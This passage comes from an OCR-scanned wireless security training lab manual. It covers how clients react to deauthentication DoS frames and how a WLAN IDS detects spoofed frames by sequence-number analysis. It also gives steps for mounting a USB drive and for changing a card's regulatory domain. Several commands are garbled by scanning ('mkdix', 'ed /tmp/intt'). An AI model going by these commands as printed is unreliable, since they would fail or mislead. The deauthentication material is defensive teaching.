non-persistent DoS attack. Section ADDITIONAL EXERCISE Question; What does the client system attempt to do when it receives a deauthenticate frame? Answer: The victim station will attempt to reauthenticate to the network by issuing a probe request, then authenticate and associate requests. Depending on when the deauthenticate frame is received in the process of reconnecting to the network, the station will have to restart the probe request and authenticate and associate process in order to regain connectivity to the network. Question: Is there a way we can determine if the deauthenticate frame was transmitted by ‘an access point or by an attacker? ‘Answer: Examine the sequence number used by the attacker. The sequence number is controlled by firmware for the Prism2 cards supplied in the SWAT kit, and will likely be significantly smaller or larger than the sequence numbers used by the access point. Even though the access point frames and the deauthenticate frames have the same source MAC address and BSSID, a WLAN IDS system can use sequence number analysis to identify anomalies in the pattern and flag the traffic as originating from a spoofed source. 11-10Lab Appendix A This appendix provides a simple set of instructions to use a USB thumb drive for persistent storage when using the Auditor Security Toolkit Linux distribution.Purpose: Configure Auditor to save files to persistent storage. Description: Because the Auditor Security Toolkit Linux distribution is CD-ROM based, when the system is powered-off, all files that were created are lost. Follow these instructions to save files to a USB thumb drive 4.1.1. Open an XTerm Window Open a terminal window by clicking on the XTerm of the square with the number 1 in it) ‘on (the small black box to the left 1.1.2. Make a Mount Point Create a directory in the /mnt directory that will be used as a mount point for the USB drive, as shown below. root@D[root]# mkdix /mnt/thumb xoot@0 [root] # 1.1.3. Insert the USB Thumb Drive Insert the thumb drive into an available USB port. 1.1.4. Identify the USB Device Identify the USB device name used for the thumb drive on your system. For most users, this will be the "/dev/sdal" device. We can get a list of available hard drive partitions and devices by running the "fdisk -I" command, as shown below. root@1{root]# fdisk -1 Disk /dev/sda: 65 MB, 65208320 bytes 128 heads, 11 sectors/track, 89 cylinders Units = cylinders of 1419 * 912 = 726528 bytes Device Boot Start Bnd Blocks Id System fdev/sdal * 1 90 63674 «6 FATIE Partition 1 has different physical/logical endings: phys=(88, 128, 11) logical=(89, 97, 1) root@1[root]#We can see from this output that the USB device is /dev/sda!. ‘This will be the appropriate device name for almost all users. * 1.1.5. Mount the USB Drive Mount the USB drive as shown below. root@1{root]# mount -t vfat /dev/sda1 /mnt/thumb root@l{roct] # 1.1.6. Save Files to the USB Drive When you want to save a file to the USB drive, simply copy it to the /mnt/thumb directory with the “op" command, as shown below. root@1(1ab5]# cp lab@capture.cap /mnt/thunb root@1 (root) # 1.1.7, Unmount the USB Drive Before removing the USB drive, you must unmount it. This will ensure there are no outstanding write operations pending and prevent you from losing data. root@1{root]# umount /mnt/thumb root@1 (root) # 4.1.8. Remove the USB Drive The USB drive is now safe to remove with your data safely stored.This page intentionally left blank.SWAT Kit - International Firmware Selection The wireless cards distributed with the SWAT kit are restricted to transmit and monitor on the channels approved by the US Federal Communications Commission. Follow the instructions in this document to change the regulatory domain on the SWAT kit wireless card for your locale. To complete these steps, you will need the wireless card that was distributed with your SWAT kit as well as the bootable Linux CD-ROM used for lab exercises. Step 1. Boot the Linux CD-ROM Insert the course CD into your CD drive and restart your system, instructing the BIOS to boot from the CD. Once you have booted the Linux CD, open an xterm shell by clicking on the xterm button on the taskbar. Step 2. Insert SWAT kit wireless card Insert the SWAT kit wireless card into the PC Card or PCMCIA slot on your system. Step 3. Execute the chregdom script Execute the script designed to change the local regulatory domain by entering the following commands into your xterm window: root@1[root]# ed /tmp/intt root@1[intl]# ./chregdom.sh Step 4. Answer prompts The chregdom script will ask you to supply your wireless card interface name, and the desired regulatory domain. Please supply this information as instructed. NOTE: Most systems will recognize the SWAT kit wireless card as the "wlan0" interface. Some systems with built-in wireless cards (excluding Intel Centrino wireless cards) may have a naming conflict with a built-in wireless card. In these cases, your system may recognize your SWAT kit wireless card as "wlan". You can determine what interface name is in use by running the "ifconfig -a" and "dmesg" commands on the system. Please seek the assistance of a proctor or the instructor if you need assistance. After supplying the necessary information, the chregdom script will ask you to wait while it updates the wireless card. DO NOT interrupt this process, otherwise it is possible you could irrevocably damage your wireless card.